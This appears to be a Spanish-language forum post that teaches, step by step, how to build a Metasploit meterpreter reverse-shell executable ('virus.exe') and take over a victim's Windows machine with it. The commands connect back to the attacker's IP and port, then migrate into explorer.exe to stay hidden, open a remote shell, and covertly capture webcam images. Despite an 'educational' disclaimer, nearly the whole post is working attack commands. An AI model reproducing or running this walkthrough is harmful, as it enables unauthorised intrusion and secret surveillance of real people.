Bienvenidos a un nuevo post, primero y principal este post lo realiazo con intenciones de educacion e informacion para poder protegernos sobre lo que trataremos este dia.
No me hago responsable del uso indebido del mismo.
Crear virus, infectar equipo remoto, activar y grabar webcam.
Es una herramienta incluida en el framework de metasploist con la cual se pueden realizar archivos ejecutables .exe, dicho archivo lleva inyectado la posibilidad de ejecutar el playload en la maquina remota "Victima". De esta manera obtendramos el control de dicha maquina.
El ejecutable se puede utilizar para crear conecciones inversas, esto quiere decir que en ves de nosotros conectarnos a la maquina remota. La maquina remota se conectara a nosotros.
Ingresamos a consola y ejecutamos el siguiente comando
mspayload windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=9999 x > /Directorio/Ubicacion/virus.exe
LHOST = Nuestra direccion IP
LPORT = Puerto al cual se conectara
Ahora necesitamos un servidor que interactue con el virus que hemos creado.
Abrimos una nueva terminal y ejecutamos el siguiente comando.
msfconsole
Una vez que el server este corriendo tenemos que ejecutar el siguiente comando
use multi/handler
Con este comando lo que hacemos es poner a nuestro server en modo de escucha esperando la conexion de nuestro equipo victima
set PAYLOAD windows/meterpreter/reverse_tcp
Mostramos las opciones con el siguiente comando
show options
Debemos configurar el LPORT y LHOST con el siguiente comando
set LHOST 192.168.0.8
set LPORT 9999
Una vez configurados procederemos a explotar el virus
exploit -j
con el comando j indicamos que quede abierto el puerto en escucha, debido a que si teneos mas de un virus funcionando solo podra escuchar uno.
Luego ejecutamos el siguiente comando par iniciar la sesion.
sessions -i
Con este comando nos dara la informacion del equipo victima.
Procedemos a ejecutar el siguiente comando.
sessions -i 1
A esta altura ya tendremos control del equipos victima. Podemos ver los procesos que el usuario este usando con el siguiente comando.
ps
Cabe aclarar que el proceso en ese caso (virus.exe) el usuario podra verlo en su administrador de tareas y solaente dandole finalizar nos desconectaria, para evitar esto tendremos que migrar el proceso dentro de otro proceso. Deberemos identificar que numero es el proceso explorer en nuestro equipo en mi caso es el 1344 y deberemos ejecutar el siguiente comando.
migrate 1344
Para ingresar a las carpetas de la pc vitima ejecutaremos el siguiente comando.
shell
Con el siguiente comando saldremos del expplorador de arhivos por medio de consola de la maquina victima
exit
Ahora ingresaremos a la webcam del equipo victima si contara con ella, deberemos ejecutar el siguiente comand.
run webcam -p /var/www
Con el comando -p le estamos indicando que nos captura imagenes de la webcam.
(/var/www ) Es el directorio de destino donde se guardaran las imagenes capturadas.
Con el comando close cerramos la sesion iniciada en el equipo victima.
close
Bueno amigos esto es todo por ahora, espero que les sea de utilidad y puedan protejerse de este tipo de ataques.
Si lo que encontraste en este Post te sirvió , no te olvides de agradecérselo al Uploader ; Tu comentario y agradecimiento es su única recompensa y estimulo para seguir compartiendo.